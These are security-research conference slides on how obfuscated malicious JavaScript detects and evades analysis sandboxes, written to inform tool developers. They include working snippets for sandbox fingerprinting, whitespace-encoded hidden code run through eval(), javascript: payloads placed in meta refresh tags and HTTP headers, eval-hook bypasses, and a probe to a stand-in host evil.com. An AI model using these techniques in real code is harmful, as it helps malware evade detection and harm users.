© 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice
Circumventing Automated JavaScript Analysis
Billy Hoffman ([email protected])
HP Web Security Research Group
Overview
• JavaScript is part of the attacker's toolkit
−All the “vanilla” stuff over
−Packing traditional malware
• IBM ISS: “In second half 2007 Web attack obfuscation approached 100%”*
• Exploit frameworks amplify the problem
−Rapid adoption of new techniques
• We need tools to analyze this
• How are we doing and can we win?
* From: IBM Internet Security Systems X-Force® 2008 Mid-Year Trend Statistics
Obfuscation Design Pattern
• Malicious code is stored
−String literals
−Numeric literals
• Decode function unpacks literals into new code
• Ratio of literals to total code is huge!
−Normal code: 2%-7%
−Obfuscated code: > 30%
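The literal-to-code ratio above can be approximated with a few lines of JavaScript. This is a minimal sketch, not the measurement used for the slide's figures: the regular expression is a simplification rather than a real tokenizer, and the names `literalRatio` and `looksPacked` are hypothetical.

```javascript
// Rough share of source characters that sit inside string or numeric literals.
// Assumption: a regex is good enough for a first triage pass; it is not a JS parser.
function literalRatio(source) {
  if (source.length === 0) return 0;
  // Double-quoted strings, single-quoted strings, hex numbers, decimal numbers.
  var literalPattern = /"(?:[^"\\\n]|\\.)*"|'(?:[^'\\\n]|\\.)*'|\b(?:0[xX][0-9a-fA-F]+|\d+(?:\.\d+)?)\b/g;
  var literalChars = 0;
  var match;
  while ((match = literalPattern.exec(source)) !== null) {
    literalChars += match[0].length;
  }
  return literalChars / source.length;
}

// Hypothetical threshold, borrowed from the "> 30%" figure on the slide.
function looksPacked(source) {
  return literalRatio(source) > 0.30;
}
```

A high ratio only says the script is packed, not that it is hostile, so a check like this is best used to decide what to unpack first.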
Obfuscation Example
Obfuscation != Malicious
• Legitimate reasons for obfuscating
−“Protect” client-side code
−Reducing download size
• Common packers
−JSMin
−Dean Edwards packer
−Yahoo’s
• Result: It's tough to know what to analyze
Original Approach to JS Analysis
• The Lazy Method
−Replace dangerous calls with alert()
−Run in a browser
• The Tom Liston Method
−Wrap writes in <TEXTAREA>’s
−Run in a browser
• The Perl-Fu Method
−Port malware to Perl
• The Monkey Wrench Method
−Run it in SpiderMonkey
Tricks for Defeating Analysis
• Deliberate sandbox breaks
−</TEXTAREA>
• Integrity Checks
−arguments.callee.toString()
• arguments.callee.toString().replace(/\W/g,"").toUpperCase();
−Gives source code of function body
• Length checks
• Use function body as key
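A rough sketch of why the "replace the dangerous call with alert()" approach trips an integrity check. It uses `fn.toString()` on a named function instead of `arguments.callee` so that it also runs in strict mode; `sourceFingerprint`, `looksUntampered`, `decoder` and `patched` are hypothetical names for illustration only.

```javascript
// Normalise a function's source as on the slide: drop non-word characters, upper-case the rest.
function sourceFingerprint(fn) {
  return fn.toString().replace(/\W/g, "").toUpperCase();
}

// Length check: any inserted hook or logging call changes the fingerprint length.
function looksUntampered(fn, expectedLength) {
  return sourceFingerprint(fn).length === expectedLength;
}

// Hypothetical original decode routine.
function decoder() { return "payload"; }

// Hypothetical analyst edit of the same routine (never called here).
var patched = function decoder() { log("hooked"); return "payload"; };

// Length the sample would have baked in when it was generated.
var expectedLength = sourceFingerprint(decoder).length;
```

Here `looksUntampered(decoder, expectedLength)` holds while `looksUntampered(patched, expectedLength)` does not, which is all a sample needs to refuse to decode. Using the fingerprint itself as key material works the same way.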
VBScript Wrapper
• Still in use!
−Older DHTML web apps
−Plug-in enumeration (IE8)
−Malware
• No open source VBScript parsers
• No public standard grammar
• Not very wide-spread
[Diagram: VBScript, JavaScript, JavaScript]
Preventing Sample Collection
• Can’t reverse what you don’t have!
• Track IPs
−Geolocation
−Blacklist security firms
• Serve once per IP
• User-agent sniffing
• document.referrer tricks
For those playing at home
Approach | Difficulties
All Approaches | Sampling prevention
The Lazy Method | Integrity checks; running hostile code in browser
The Tom Liston Method | Integrity checks; </TEXTAREA> escapes; running hostile code in browser
Perl Fu | Way too time consuming; translating JavaScript constructs
The Monkey Wrench Approach | Does pretty well
Approach Today
• Combination of automatic and manual
• Interpreters and debuggers (aka sandboxes)
−Rhino
−NJS
−DecryptJS
−SpiderMonkey
• Trap/monitor certain events
−DOM calls
−eval()s, etc
It's More Complex Than That
• JS interpreter/debugger is less than ½ the battle
• JavaScript != DOM
−Host objects
−Events/Timers
−HTTP requests
−Error handling
• DOM >= HTML
−HTTP headers/cookies
−Browser environment
−Plug-ins
Fundamental Issue
Current JavaScript sandboxes fail to fully/properly emulate browser
environment. These discrepancies are detectable by the JavaScript
running inside the sandbox.
Detecting JavaScript Sandboxes
• 4 big areas
−DOM Testing
−Network Testing
−Execution Environment Testing
−Plug-in Testing
• Use test results
−Decrypt next layer
−Handshake to serve next layer
DOM Testing
• Using the DOM values
• Detecting presence/lack of
• Get and sets on values
• Interacting with HTML elements
DOM Testing: Basic
• Sandbox Specific Functions
−gc()
−clone()
−trap()
−untrap()
−readline()
• Malware forces SpiderMonkey to die
−try {quit();} catch (e) { }; //more code here
Detecting Sandbox Specific Functions
if(typeof(gc)=="function") {… } else {…}
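The same check can be turned around and used as a self-test by whoever maintains the sandbox. A minimal sketch, assuming the caller passes in the global object to inspect; `SHELL_ONLY_FUNCTIONS` and `findShellFunctions` are hypothetical names, and the list holds only the helpers named on the slide.

```javascript
// Helpers the slide lists as present in the SpiderMonkey shell but not in a browser.
var SHELL_ONLY_FUNCTIONS = ["gc", "clone", "trap", "untrap", "readline"];

// Returns the shell-only helpers that are callable on the given global object.
function findShellFunctions(globalObject) {
  var found = [];
  for (var i = 0; i < SHELL_ONLY_FUNCTIONS.length; i++) {
    var name = SHELL_ONLY_FUNCTIONS[i];
    if (typeof globalObject[name] === "function") {
      found.push(name);
    }
  }
  return found;
}
```

An empty result does not prove the environment looks like a browser; it only rules out this one class of leak.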
Function Clobbering
• JavaScript is highly dynamic
• Can redefine functions at runtime!
Redefining print() as quit()
Redefining quit() To Nothing
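A small sketch of clobbering and of one way an analysis harness might survive it: keep a private reference to each helper before any sample code runs. The `shell` object here is a hypothetical stand-in for the interpreter's global object, not a real SpiderMonkey API.

```javascript
// Hypothetical stand-in for a shell's global object.
var shell = {
  log: [],
  print: function (msg) { this.log.push(msg); },
  quit: function () { this.log.push("<quit>"); }
};

// Harness side: save a reference before the sample gets a chance to run.
var originalPrint = shell.print;

// Sample side: redefine print() as quit().
shell.print = shell.quit;
shell.print("decoded layer");               // records "<quit>", the message is lost

// Harness side: the saved reference is unaffected by the reassignment.
originalPrint.call(shell, "decoded layer"); // records "decoded layer"
```

Saved references only help if they live somewhere the sample cannot reach, which is one reason hooks placed inside the interpreter are more robust than hooks written in script.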
Intertwined DOM Properties
• Various aliases in the DOM
−document.location == window.location == document.URL
−window == window.window == window.self == window.parent
• == window.self.self.self.self...
−Any global variable attaches to window
• var spi = 5; window.spi == spi; //true
• Set a value on one alias
• Read on another alias
• Different values mean a sandbox
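The set-on-one-alias, read-on-another test might look roughly like this. It is a sketch that takes a window-like object as a parameter so it can be pointed at an emulated DOM; `checkWindowAliases` and the probe property name are hypothetical, and `window.parent` is left out because it only equals `window` in a top-level document.

```javascript
// Returns a list of alias checks that failed; an empty list means the aliases agree.
function checkWindowAliases(win) {
  var failures = [];
  var aliases = ["window", "self"];
  // Identity: each alias should be the very same object.
  for (var i = 0; i < aliases.length; i++) {
    if (win[aliases[i]] !== win) failures.push(aliases[i]);
  }
  // Set a value on the object itself, then read it back through each alias.
  win.__aliasProbe = 42;
  for (var j = 0; j < aliases.length; j++) {
    var alias = win[aliases[j]];
    if (!alias || alias.__aliasProbe !== 42) failures.push(aliases[j] + " read-back");
  }
  delete win.__aliasProbe;
  return failures;
}
```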
document.retarded
• Mosaic Netscape 0.9beta (1994)
• Set using HTTP headers
−Set-Cookie:
−Cookie:
• Get/Set using JavaScript
−document.cookie
• Set using HTML
−<META> tag
Meta Tag
• Supply meta data about HTML document
• http-equiv attribute
−Allows document to specify HTTP headers
−Content overriding an application protocol
HTTP-EQUIV to the rescue
• Setting cookies with HTML
<html>
<meta HTTP-EQUIV="Set-Cookie" CONTENT="cook2=Value 2">
<meta HTTP-EQUIV="Set-Cookie" CONTENT="cook1=Value 1">
<script>
alert(document.cookie);
</script>
Setting Cookies with HTML
Hello Proprietary Extension!
• Setting cookies with HTML
<html>
<meta HTTP-EQUIV="Set-Cookie" CONTENT="cook2=Value 2; HttpOnly">
<meta HTTP-EQUIV="Set-Cookie" CONTENT="cook1=Value 1">
<script>
alert(document.cookie);
</script>
Setting Cookies with HTML
More Meta Tag Fun
• Hide Script in non-scriptable attribute
<html>
<title>Safe</title>
<meta http-equiv="refresh" content="0;url=javascript:alert('EVIL')">
<h1>All safe. Trust me!</h1>
</html>
HTTP Refresh Header
• Completely remove JS from response body!
HTTP/1.1 200 OK
Refresh: 0;url=javascript:alert('EVIL!')
Connection: close
Content-Length: 29

<h1>I'm Clean... really.</h1>
Psst!
(IE8 supports the data: URI...
data:text/html and data:text/javascript are
awesome!)
Network Testing
• Sandboxes use dummy network objects
−Good “Are you a browser?” test
• Use information about response
−DNS successful?
−Last Modified?
−Image Dimensions?
−Valid Response?
• Forces Sandbox to send network traffic
−Web bugs for hackers?
Network Testing – DNS Lookups
<script>
var count =0;
function loaded(name) {if(name!="bad")count++;}
window.onload = function evil() {
if(count == 1) alert("Browser!");
else alert("Sandbox!");
}
</script>
<iframe src="http://doesnotexist1" onload="loaded(this.name);" name="bad"></iframe>
<iframe src="http://doesnotexist2" onload="loaded(this.name);" name="bad"></iframe>
<iframe src="http://exists/foo.html" onload="loaded(this.name);" name="good"></iframe>
Network Testing – DNS Lookups
Network Testing - Images
• Image object provides rich meta data
−Length
−Width
−Image was valid?
• CSS Images too
• Use this information
−Complex handshaking
−Construct a Key
var img = new Image();
img.onload = goodFunc;
img.onerror = badFunc;
img.src="http://evil.com/"
Side Note: Image Side Channels
• JavaScript Image object
• Height + width = 8 bytes
• How to send 0xFFFFFFFF without 4GB of pixel data?
−GIF, PNG, Windows too short
−BMP + RLE? Nope
• XBM Image Format
#define w 1351
#define h 1689
static char b[]={0};
FF XBM WTF??!!!1111oneoneoneomg
The Dan Kaminsky Option
Network Testing - Ajax
• Ajax can see HTTP response headers
−Complex handshaking
−Construct a key
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState==4 && xhr.status==200)
{
if(xhr.getResponseHeader("Secr3t") == "key") {
//do evil
}
}
}
Execution Environment Testing
• Sandboxes execute code differently
−Trap function calls
−Step/break on code
−Manipulate data
• Can tell these differences
−Timing information
−Event Order
−Error Handling
Timing Information
• Use JavaScript’s Date object
−Millisecond resolution times
• Can detect paused execution
<script>
var start = (new Date()).getTime();
document.writeln(String.fromCharCode(66,77,72));
</script>
<script>
var diff= (new Date()).getTime() - start;
if(diff < 3) document.writeln("Browser");
else document.writeln("Sandbox");
</script>
Detecting Steps/Breaks with Timers
• Timers are a pain!
−Can’t really wait 5 seconds
−Ordering
−Clearing
• Can detect paused execution
• Start a Timer
−Perform some math operation
• After fixed interval
−Sample the value
[Diagram: repeated count++ ticks between timer start and sample]
Detecting Steps/Breaks with Timers
var count = 0;
setInterval("count++;", 10);
setTimeout(checkSum, 1000);
function checkSum() {
//allow for skew: a 10 ms interval ticks about 100 times in 1000 ms
if(count >= 90 && count <= 100) {
alert("Browser");
} else {
alert("Sandbox");
}
}
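The expected tick count is simply the sampling window divided by the interval, so the skew check can be written as a small pure function. A sketch under that assumption; `ticksLookNormal` and its `tolerance` parameter are hypothetical and not part of the original slide code.

```javascript
// True when the observed tick count is close to windowMs / intervalMs.
// tolerance is the fraction of ticks allowed to be lost to timer skew (e.g. 0.1 = 10%).
function ticksLookNormal(count, intervalMs, windowMs, tolerance) {
  var expected = windowMs / intervalMs;
  return count >= expected * (1 - tolerance) && count <= expected;
}
```

For a 10 ms interval sampled after 1000 ms the expected count is 100, so `ticksLookNormal(98, 10, 1000, 0.1)` passes while a count of 3 (execution was paused) or 1000 (timers were fast-forwarded) does not. A sandbox that wants to pass has to fire emulated timers at a realistic rate, not just in the right order.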
Event Order
• Sandboxes don’t run events in the proper order
• XMLHttpRequest’s onreadystatechange() fires 4 times
• onclick() >> onclick() >> ondblclick()
• onkeydown() >> onkeypress() >> onkeyup()
• onmousedown() >> onmouseup() >> onclick()
• onmouseover() >> onmousemove()
• onclick() >> onfocus() (for inputs)
• onfocus() >> onblur()
• onload() >> onunload()
Advanced Event Order
• Dependents' onload before window.onload
−iFrames
−Images
• Event propagation
−DOM events must bubble
−Continue based on return value of event
• Events that never fire
−Invisible with CSS
[Diagram: onclick bubbling from INPUT through DIV, DIV, BODY to WINDOW]
Error Handling
• window.onerror handles uncaught exceptions
• Induce syntax errors
• Recover in handler
<script>
window.onerror = function() {
//evil code
}
</script>
<script>
Lolz &nd B00m$; //Syntax Error
</script>
Error Handling
• window.onerror handles uncaught exceptions
• Induce runtime errors
• Harder to handle/debug
window.onerror = function() {
//evil code
}
function boom() {
return 'so long!' & boom();
}
boom(); // error too much recursion
Advanced Error Handling
• Detailed info passed to window.onerror
−Message
−File
−Line Number
• Can be used to
−Fingerprint web browser
−Verify domain/location
−Construct a decryption key
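To see why the error details matter to a sandbox, consider a key derived from the three values passed to window.onerror. The following is only a toy illustration: `keyFromError` and its hash arithmetic are hypothetical, and real samples use whatever derivation their author chose.

```javascript
// Derive a 32-bit toy key from the message, file and line number of an error.
function keyFromError(message, file, line) {
  var material = message + "|" + file + "|" + line;
  var key = 0;
  for (var i = 0; i < material.length; i++) {
    // Multiply-and-add hash, truncated to an unsigned 32-bit value on every step.
    key = (key * 33 + material.charCodeAt(i)) >>> 0;
  }
  return key;
}
```

Because the message text differs between browsers and the file and line depend on where the script was served from, an emulator that reports even a slightly different line number ends up with the wrong key.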
Plug-in Testing
• Not just navigator.plugins checks
• Timing is a cool test
−Did I really invoke that ActiveX object?
• Sizing is a cool test
−Is that Applet really 400 x 300?
• Cross Communication
−Really sexy!
−Apply previous methods inside plug-in
• Error handling, Eventing, etc
JavaScript -> Flash -> JavaScript
• Multiple ways
−getURL();
−Flash LSO
• Additional capabilities
−Richer HTTP requests
−More File formats
• Excellent browser support
[Diagram: Flash, JavaScript, JavaScript]
JavaScript -> Java -> JavaScript
• Lots of fun object casting
−JSObject -> double -> JSObject
• Java has more capabilities than JS
−High resolution timers
−Sockets
−Internal IP
• Assault the researcher!
−Signed Applets can access the file system!
• LiveConnect
−var myAddress = java.net.InetAddress.getLocalHost();
[Diagram: Java, JavaScript, JavaScript]
Preventing Sample Gathering
• Browser Identification for Web Applications (Shreeraj Shah 2004)
• HTTP headers
−Ordering and Values
−Redirects, form posts, content types, cookie settings
• HTTP Caching
−Obeying the directives
• HTTP/1.1 HTTP/1.0 Precedence
−Sending conditional GETs
Crazy Idea #1
• Obfuscated Code is obviously interesting
−But not always malicious
• “Safe” looking code might not be interesting
• Can I create code that doesn’t look malicious?
Dehydrating a String
• Converts any string into whitespace
• 7 bits per character
−1 = space
−0 = tab
• \n means we are done
• ‘a’ = 1100001
• Dehydrate('a') = space, space, tab, tab, tab, tab, space
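The 'a' example can be checked by hand with a short helper that prints the encoding using visible stand-ins. A sketch only: `toSevenBits` and `visibleEncoding` are hypothetical helpers, and S and T are used here in place of the real space and tab characters so the result is readable.

```javascript
// Render one character as its 7-bit pattern, most significant bit first.
function toSevenBits(ch) {
  var bits = "";
  for (var j = 6; j >= 0; j--) {
    bits += (ch.charCodeAt(0) & (1 << j)) ? "1" : "0";
  }
  return bits;
}

// Same mapping as the slide (1 = space, 0 = tab), shown as S and T.
function visibleEncoding(ch) {
  return toSevenBits(ch).replace(/1/g, "S").replace(/0/g, "T");
}
```

`toSevenBits('a')` gives 1100001 and `visibleEncoding('a')` gives SSTTTTS, matching the space, space, tab, tab, tab, tab, space sequence. Seven bits cover ASCII only, so characters with codes above 127 would lose their high bits.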
Dehydrate Function
function dehydrate(s) {
  var r = new Array();
  for(var i=0; i < s.length; i++) {
    //walk the 7 bits of each character, most significant first
    for(var j=6; j >=0; j--) {
      if(s.charCodeAt(i) & (Math.pow(2,j))) {
        r.push(' ');
      } else {
        r.push('\t');
      }
    }
  }
  r.push('\n');
  return r.join('');
}
Hydrate Function
function hydrate(s) {
  var r = new Array();
  var curr = 0;
  while(s.charAt(curr) != '\n') {
    var tmp = 0;
    //rebuild one character from 7 whitespace characters
    for(var i=6; i>=0; i--) {
      if(s.charAt(curr) == ' ') {
        tmp = tmp | (Math.pow(2,i));
      }
      curr++;
    }
    r.push(String.fromCharCode(tmp));
  }
  return r.join('');
}
Invisible Malicious Code!
//st4rt
//3nd
var html = document.body.innerHTML;
var start = html.indexOf("//st" + "4rt");
var end = html.indexOf("3" + "nd");
var code = html.substring(start+12, end);
eval(hydrate(code));
Crazy Idea #2
• Who cares how it's encoded?
• Eventually they have to execute the string of code
• CaffeineMonkey et al are just hooking eval()
• Can I execute malicious code stored in a string without eval()?
Eval() The Interpreter has a Posse…
var evilCode = "alert('evil');";
window.location.replace("javascript:" + evilCode);
document.location.replace("javascript:" + evilCode);
setTimeout(evilCode, 10);
setInterval(evilCode, 500);
new Function(evilCode)();
//IE only
window.execScript(evilCode);
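For tool developers, the list above is effectively a checklist of entry points to hook. A minimal sketch of wrapping the function-style sinks on a global-like object follows; `hookCodeSinks` and `record` are hypothetical names, and this is not how CaffeineMonkey or any other named tool is implemented.

```javascript
// Wrap string-executing entry points on a global-like object and report the code they receive.
// record(name, code) is a caller-supplied callback.
function hookCodeSinks(globalObject, record) {
  var sinkNames = ["eval", "setTimeout", "setInterval", "execScript"];
  for (var i = 0; i < sinkNames.length; i++) {
    (function (name) {
      var original = globalObject[name];
      if (typeof original !== "function") return; // sink not present in this environment
      globalObject[name] = function (code) {
        if (typeof code === "string") record(name, code);
        return original.apply(globalObject, arguments);
      };
    })(sinkNames[i]);
  }
}
```

This covers only part of the list: the `Function` constructor and `javascript:` URLs assigned through `location.replace()` need their own hooks, and wrapping `eval` in script turns it into an indirect (global-scope) eval, which a sample can detect. Hooks placed inside the interpreter avoid both problems.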
Fixing All of This
• Advice for tool developers
−Remove discrepancies between sandbox and browser
• DOM/HTTP/DNS/Network/Eventing
−Everything should be interesting
−The sandbox needs a sandbox; you will be attacked.
• Advice for others
−Microsoft
• Publish a Grammar for VBScript
• Disable completely based on DOCTYPE
−Adobe: Release a controllable Flash VM
Shoulders of Giants
• Jose Nazario
• Ben Feinstein
• Internet Storm Center guys
• Stephan Chenette, et al. @ WebSense
• Shreeraj Shah
• Rob Freeman
• Aviv Raff
Questions?